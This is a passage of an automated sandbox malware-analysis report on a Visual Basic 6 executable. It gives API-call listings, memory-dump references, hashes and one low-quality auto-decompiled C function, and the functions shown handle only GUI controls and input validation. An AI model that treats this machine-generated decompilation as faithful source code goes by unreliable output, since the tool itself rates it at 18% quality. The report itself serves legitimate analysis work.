                                                                                • __vbaVarMove.MSVBVM60 ref: 004225DC
                                                                                • __vbaFreeVar.MSVBVM60(00422646), ref: 0042262A
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0042262F
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422634
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422639
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0042263E
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422643
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$Copy$ErrorSystem$#527#618LateList
                                                                                • String ID: SelStart
                                                                                • API String ID: 1057817874-2158561977
                                                                                • Opcode ID: 496c829554f2279cb53492a7595390ea13f8adffaf09cafaeb481c82134aa819
                                                                                • Instruction ID: 71a91a91a77c6061a498dc32991692de7b09fed06f21a730561632b8975efec3
                                                                                • Opcode Fuzzy Hash: 496c829554f2279cb53492a7595390ea13f8adffaf09cafaeb481c82134aa819
                                                                                • Instruction Fuzzy Hash: 508118B1C002299FCB64DFA5DE84BEDBBB9FF44304F10819AE409A7260DB745A89CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00419360, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaSetSystemError.MSVBVM60(?,?), ref: 004193C6
                                                                                • __vbaSetSystemError.MSVBVM60(?), ref: 004193D3
                                                                                • __vbaFpI4.MSVBVM60 ref: 00419446
                                                                                • __vbaFpI4.MSVBVM60 ref: 0041949B
                                                                                • __vbaI2I4.MSVBVM60 ref: 004194BE
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 004194DD
                                                                                • __vbaI2I4.MSVBVM60(?), ref: 00419501
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000034), ref: 0041953B
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 00419550
                                                                                • __vbaI2I4.MSVBVM60 ref: 00419560
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 0041957F
                                                                                • __vbaI2I4.MSVBVM60(?), ref: 004195A8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000034), ref: 004195DD
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 004195F2
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,0000000A,0000000F), ref: 0041962E
                                                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041963C
                                                                                • __vbaI4Var.MSVBVM60(?,?,?,00000000,00000000,00000003), ref: 00419657
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00419672
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419677
                                                                                • __vbaFreeObj.MSVBVM60(004196A2), ref: 0041969B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$ErrorSystem$CheckFreeHresultNew2$CallLate
                                                                                • String ID: eXTEditBox1
                                                                                • API String ID: 3237385300-922357469
                                                                                • Opcode ID: e180f32e81e3e6d767502f67dfbe6c3a4e5c335ffba80cc4171509e319854b3b
                                                                                • Instruction ID: c710e037b903dfe6e1e3dc984430160e750ec2e9efa47df8a5809f75c2f4972f
                                                                                • Opcode Fuzzy Hash: e180f32e81e3e6d767502f67dfbe6c3a4e5c335ffba80cc4171509e319854b3b
                                                                                • Instruction Fuzzy Hash: 2DC16F70A00208EFDB14DFA9D984BDEBBB4FF58300F10806EE545A72A0D779A945CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421900, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 175COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaChkstk.MSVBVM60(?,00401D26), ref: 0042191E
                                                                                • __vbaFailedFriend.MSVBVM60(?,?,?,?,00401D26), ref: 0042195C
                                                                                • __vbaOnError.MSVBVM60(000000FF), ref: 00421A32
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,00000034), ref: 00421A67
                                                                                • __vbaStrI4.MSVBVM60(00000001,?), ref: 00421A8D
                                                                                • __vbaStrMove.MSVBVM60 ref: 00421A98
                                                                                • __vbaStrCat.MSVBVM60(00000000), ref: 00421A9F
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411580,0000001C), ref: 00421ADD
                                                                                • __vbaCastObjVar.MSVBVM60(?,004113E8), ref: 00421AFE
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00421B09
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00421B12
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00421B1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$CastChkstkErrorFailedFriendMove
                                                                                • String ID: circ_$poly_$rect_
                                                                                • API String ID: 3373357413-2379982697
                                                                                • Opcode ID: 9dcd251e9e368f8c6c461c7d85bc313f304b735d2f2cec1fe12a740e098b7f12
                                                                                • Instruction ID: 43e21aa390423ac4bb5be4ef763bcdf32f7e6bd7be1f21c6f9aae0b9eacb4217
                                                                                • Opcode Fuzzy Hash: 9dcd251e9e368f8c6c461c7d85bc313f304b735d2f2cec1fe12a740e098b7f12
                                                                                • Instruction Fuzzy Hash: B7813EB0900218EFDB04DFA4DA58BDEBBB5FF18304F208159E506BB2A0DB785A85DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422F70, Relevance: 47.3, APIs: 17, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaAryConstruct2.MSVBVM60(?,00411AC8,00000008,00001C20,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00422FAC
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FC0
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FCD
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FDA
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FE7
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FF4
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423001
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042300E
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042301B
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423028
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423035
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423042
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042305C
                                                                                • __vbaStrCat.MSVBVM60(?,004117A4,?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042306E
                                                                                • __vbaStrMove.MSVBVM60(?,004117A4,?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423079
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042308F
                                                                                • __vbaAryDestruct.MSVBVM60(00000000,?,004230B5,?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 004230AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Copy$BoundsConstruct2DestructErrorGenerateMove
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 4063757251-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 1826c31338c8c831fd2ed301a4fe05264573cbf1db843c12b00fde34302af9b6
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: 4B313C38E511289BCB04DB98DD80AED7BB5FF4C341B50802BD50277764DB789946CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418AA0, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418AEF
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418AF7
                                                                                • __vbaStrI4.MSVBVM60(00000003,?), ref: 00418B05
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B0C
                                                                                • __vbaStrCmp.MSVBVM60(00000000), ref: 00418B13
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B25
                                                                                • __vbaStrI4.MSVBVM60(00000000,?), ref: 00418B3A
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B41
                                                                                • __vbaStrCmp.MSVBVM60(00000000), ref: 00418B48
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B5A
                                                                                • __vbaStrI4.MSVBVM60(00000002,?), ref: 00418B6B
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B72
                                                                                • __vbaStrCmp.MSVBVM60(00000000), ref: 00418B79
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B8B
                                                                                • __vbaStrI4.MSVBVM60(00000001,?), ref: 00418BA3
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418BAA
                                                                                • __vbaStrCmp.MSVBVM60(00000000), ref: 00418BB1
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418BC3
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418BDB
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004015B8,0040F430,00000390), ref: 00418C1C
                                                                                • __vbaFreeStr.MSVBVM60(00418C4E), ref: 00418C46
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00418C4B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$Copy$CheckHresult
                                                                                • String ID: /0123456789$0123456789$ValidChar
                                                                                • API String ID: 3800803223-993360373
                                                                                • Opcode ID: 9936c4295f3419fa864d2406dec159a3d5d469b04311b958ada0c159a0da03f4
                                                                                • Instruction ID: ce00569a0c4faf28ac5614b842da919fe116b62d6e28782c747920d2cd8abf0a
                                                                                • Opcode Fuzzy Hash: 9936c4295f3419fa864d2406dec159a3d5d469b04311b958ada0c159a0da03f4
                                                                                • Instruction Fuzzy Hash: 6C414171D001259BCB149FA4DD44AEEBBB8FB48700F10822EE556F72A0DB746D42CBD4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418DC0, Relevance: 42.3, APIs: 28, Instructions: 336COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaRaiseEvent.MSVBVM60(?,0000000A,00000000), ref: 00418E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: EventRaise__vba
                                                                                • String ID:
                                                                                • API String ID: 143519346-0
                                                                                • Opcode ID: 2f008d390904a31820b99e5045e0684bdfc6e2f20ee1861404945bbf347468bb
                                                                                • Instruction ID: 7a7282b61c914d32d5a03fe8842630005b0ca5540c49441401ae5e2d8f5a45ae
                                                                                • Opcode Fuzzy Hash: 2f008d390904a31820b99e5045e0684bdfc6e2f20ee1861404945bbf347468bb
                                                                                • Instruction Fuzzy Hash: 9BE15A70D00209AFCB14DFA8D949AEEBBB4FF48300F14856AE545AB350DB74AD85CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00417230, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 249COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 18%
                                                                                			E00417230(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				char _v60;
				intOrPtr* _v80;
				short _t63;
				void* _t66;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t70;
				signed int _t71;
				void* _t73;
				signed int _t76;
				signed int _t77;
				intOrPtr* _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				intOrPtr* _t91;
				signed char _t95;
				signed int _t97;
				intOrPtr* _t101;
				char* _t116;
				intOrPtr _t129;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t138;
				intOrPtr* _t140;
				void* _t141;
				void* _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr* _t146;
				intOrPtr _t151;

				_t144 = _t143 - 0xc;
				 *[fs:0x0] = _t144;
				_t145 = _t144 - 0x48;
				_v16 = _t145;
				_v12 = 0x401438;
				_v8 = 0;
				_t140 = _a4;
				_t63 =  *((intOrPtr*)( *_t140 + 4))(_t140, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t141);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v56 = 0;
				_v60 = 0;
				__imp____vbaI2I4();
				_t146 = _t145 - 0x10;
				_t132 = _t146;
				 *((short*)(_t140 + 0x42)) = _t63;
				 *_t132 = 8;
				 *((intOrPtr*)(_t132 + 4)) = _v48;
				 *(_t132 + 8) = L"ButtonStyle";
				 *((intOrPtr*)(_t132 + 0xc)) = _v40;
				_t66 =  *((intOrPtr*)( *_t140 + 0x390))(_t140);
				asm("fclex");
				if(_t66 < 0) {
					__imp____vbaHresultCheckObj(__eax, __esi, 0x40f430, 0x390);
				}
				_t67 = _a8;
				__eflags = _t67;
				if(__eflags == 0) {
					_t68 =  *((intOrPtr*)( *_t140 + 0x3ac))(_t140);
					__imp____vbaObjSet( &_v28, _t68);
					_t133 = _t68;
					_t70 =  *((intOrPtr*)( *_t133 + 0x9c))(_t133, 0);
					__eflags = _t70;
					asm("fclex");
					if(_t70 < 0) {
						__imp____vbaHresultCheckObj(_t70, _t133, 0x410414, 0x9c);
					}
					__imp____vbaFreeObj();
					_t58 = _t140 + 0x74; // 0x417ca1
					E0040FB74();
					__imp____vbaSetSystemError( *_t58);
					_t71 =  *((intOrPtr*)( *_t140 + 0x8c8))(_t140);
					__eflags = _t71;
					if(_t71 < 0) {
						__imp____vbaHresultCheckObj(_t71, _t140, 0x40f460, 0x8c8);
					}
					goto L26;
				} else {
					if(__eflags <= 0) {
						L27:
						asm("wait");
						_push(0x417511);
						return _t67;
					}
					__eflags = _t67 - 2;
					if(_t67 > 2) {
						goto L27;
					}
					_t73 =  *((intOrPtr*)( *_t140 + 0x3ac))(_t140);
					_t101 = __imp____vbaObjSet;
					_t134 =  *_t101( &_v28, _t73);
					_t76 =  *((intOrPtr*)( *_t134 + 0x9c))(_t134, 0xffffffff);
					__eflags = _t76;
					asm("fclex");
					if(_t76 < 0) {
						__imp____vbaHresultCheckObj(_t76, _t134, 0x410414, 0x9c);
					}
					__imp____vbaFreeObj();
					_t77 =  *((intOrPtr*)( *_t140 + 0x8c8))(_t140);
					__eflags = _t77;
					if(_t77 < 0) {
						__imp____vbaHresultCheckObj(_t77, _t140, 0x40f460, 0x8c8);
					}
					_t135 =  *_t101( &_v28,  *((intOrPtr*)( *_t140 + 0x3ac))(_t140));
					_t27 = _t140 + 0x10; // 0x80001
					_t81 =  *_t27;
					_t82 =  *((intOrPtr*)( *_t81 + 0x88))(_t81,  &_v56);
					__eflags = _t82;
					asm("fclex");
					if(_t82 < 0) {
						_t30 = _t140 + 0x10; // 0x80001
						__imp____vbaHresultCheckObj(_t82,  *_t30, 0x40f430, 0x88);
					}
					_t84 =  *((intOrPtr*)( *_t135 + 0x8c))(_t135, _v56);
					__eflags = _t84;
					asm("fclex");
					if(_t84 < 0) {
						__imp____vbaHresultCheckObj(_t84, _t135, 0x410414, 0x8c);
					}
					__imp____vbaFreeObj();
					_t136 =  *_t101( &_v32,  *((intOrPtr*)( *_t140 + 0x3b0))(_t140));
					_t88 =  *((intOrPtr*)( *_t136 + 0x80))(_t136,  &_v60);
					__eflags = _t88;
					asm("fclex");
					if(_t88 < 0) {
						__imp____vbaHresultCheckObj(_t88, _t136, 0x410414, 0x80);
					}
					_t91 =  *_t101( &_v36,  *((intOrPtr*)( *_t140 + 0x3ac))(_t140));
					_v80 = _t91;
					_t137 =  *_t101( &_v28,  *((intOrPtr*)( *_t140 + 0x3b0))(_t140));
					_t116 =  &_v56;
					_t95 =  *((intOrPtr*)( *_t137 + 0x70))(_t137, _t116);
					__eflags = _t95;
					asm("fclex");
					if(_t95 < 0) {
						__imp____vbaHresultCheckObj(_t95, _t137, 0x410414, 0x70);
					}
					_t138 = _v80;
					_push(_t116);
					_t129 =  *_t138;
					_t151 = _v60 + _v56 +  *0x401430;
					asm("fnstsw ax");
					__eflags = _t95 & 0x0000000d;
					if((_t95 & 0x0000000d) != 0) {
						goto L1;
					} else {
						 *_t146 = _t151;
						_t97 =  *((intOrPtr*)(_t129 + 0x74))(_t138);
						__eflags = _t97;
						asm("fclex");
						if(_t97 < 0) {
							__imp____vbaHresultCheckObj(_t97, _t138, 0x410414, 0x74);
						}
						__imp____vbaFreeObjList(3,  &_v28,  &_v32,  &_v36);
						L26:
						_t67 =  *((intOrPtr*)( *_t140 + 0x8a4))(_t140);
						goto L27;
					}
				}
				L1:
				return __imp____vbaFPException();
			}















































                                                                                0x00417233
                                                                                0x00417242
                                                                                0x00417249
                                                                                0x0041724f
                                                                                0x00417252
                                                                                0x0041725b
                                                                                0x0041725e
                                                                                0x00417264
                                                                                0x0041726a
                                                                                0x0041726d
                                                                                0x00417270
                                                                                0x00417273
                                                                                0x00417276
                                                                                0x00417279
                                                                                0x0041727f
                                                                                0x00417287
                                                                                0x0041728b
                                                                                0x00417294
                                                                                0x0041729a
                                                                                0x0041729d
                                                                                0x004172a3
                                                                                0x004172a6
                                                                                0x004172ae
                                                                                0x004172b0
                                                                                0x004172be
                                                                                0x004172be
                                                                                0x004172c4
                                                                                0x004172c7
                                                                                0x004172c9
                                                                                0x0041747b
                                                                                0x00417486
                                                                                0x0041748c
                                                                                0x00417492
                                                                                0x00417498
                                                                                0x0041749a
                                                                                0x0041749c
                                                                                0x004174aa
                                                                                0x004174aa
                                                                                0x004174b3
                                                                                0x004174b9
                                                                                0x004174bd
                                                                                0x004174c2
                                                                                0x004174cb
                                                                                0x004174d1
                                                                                0x004174d3
                                                                                0x004174e1
                                                                                0x004174e1
                                                                                0x00000000
                                                                                0x004172cf
                                                                                0x004172cf
                                                                                0x004174f0
                                                                                0x004174f0
                                                                                0x004174f1
                                                                                0x00000000
                                                                                0x004174f1
                                                                                0x004172d5
                                                                                0x004172d8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004172e1
                                                                                0x004172e7
                                                                                0x004172f4
                                                                                0x004172fb
                                                                                0x00417301
                                                                                0x00417303
                                                                                0x00417305
                                                                                0x00417313
                                                                                0x00417313
                                                                                0x0041731c
                                                                                0x00417325
                                                                                0x0041732b
                                                                                0x0041732d
                                                                                0x0041733b
                                                                                0x0041733b
                                                                                0x00417351
                                                                                0x00417353
                                                                                0x00417353
                                                                                0x0041735d
                                                                                0x00417363
                                                                                0x00417365
                                                                                0x00417367
                                                                                0x00417369
                                                                                0x00417378
                                                                                0x00417378
                                                                                0x00417385
                                                                                0x0041738b
                                                                                0x0041738d
                                                                                0x0041738f
                                                                                0x0041739d
                                                                                0x0041739d
                                                                                0x004173a6
                                                                                0x004173bc
                                                                                0x004173c5
                                                                                0x004173cb
                                                                                0x004173cd
                                                                                0x004173cf
                                                                                0x004173dd
                                                                                0x004173dd
                                                                                0x004173f1
                                                                                0x004173f6
                                                                                0x00417406
                                                                                0x00417408
                                                                                0x0041740f
                                                                                0x00417412
                                                                                0x00417414
                                                                                0x00417416
                                                                                0x00417421
                                                                                0x00417421
                                                                                0x0041742d
                                                                                0x00417430
                                                                                0x00417431
                                                                                0x00417433
                                                                                0x00417439
                                                                                0x0041743b
                                                                                0x0041743d
                                                                                0x00000000
                                                                                0x00417443
                                                                                0x00417443
                                                                                0x00417447
                                                                                0x0041744a
                                                                                0x0041744c
                                                                                0x0041744e
                                                                                0x00417459
                                                                                0x00417459
                                                                                0x0041746d
                                                                                0x004174e7
                                                                                0x004174ea
                                                                                0x00000000
                                                                                0x004174ea
                                                                                0x0041743d
                                                                                0x00401d2c
                                                                                0x00401d2c

                                                                                APIs
                                                                                • __vbaI2I4.MSVBVM60 ref: 00417279
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040F430,00000390), ref: 004172BE
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004172F2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 00417313
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041731C
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040F460,000008C8), ref: 0041733B
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041734F
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00080001,0040F430,00000088), ref: 00417378
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000008C), ref: 0041739D
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004173A6
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004173BA
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000080), ref: 004173DD
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004173F1
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00417404
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000070), ref: 00417421
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000074), ref: 00417459
                                                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041746D
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00417486
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 004174AA
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004174B3
                                                                                • __vbaSetSystemError.MSVBVM60(00417CA1), ref: 004174C2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040F460,000008C8), ref: 004174E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult$Free$ErrorListSystem
                                                                                • String ID: ButtonStyle
                                                                                • API String ID: 2065985295-197681400
                                                                                • Opcode ID: bbc5f41f7a73664bad52c5b0b027cf9e8044bf67631da28fab916a82f9a5d520
                                                                                • Instruction ID: 561d5bf492293b92b3287269cc5aa7cb666504282eccd3689898acaca69567e2
                                                                                • Opcode Fuzzy Hash: bbc5f41f7a73664bad52c5b0b027cf9e8044bf67631da28fab916a82f9a5d520
                                                                                • Instruction Fuzzy Hash: AD917070600205AFD7109FA5CD88EEFBBB8FF49705F108529F585E71A1DB789485CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041D540, Relevance: 39.2, APIs: 26, Instructions: 247COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaAryConstruct2.MSVBVM60(?,00411224,00000011,?,00401610,?), ref: 0041D57F
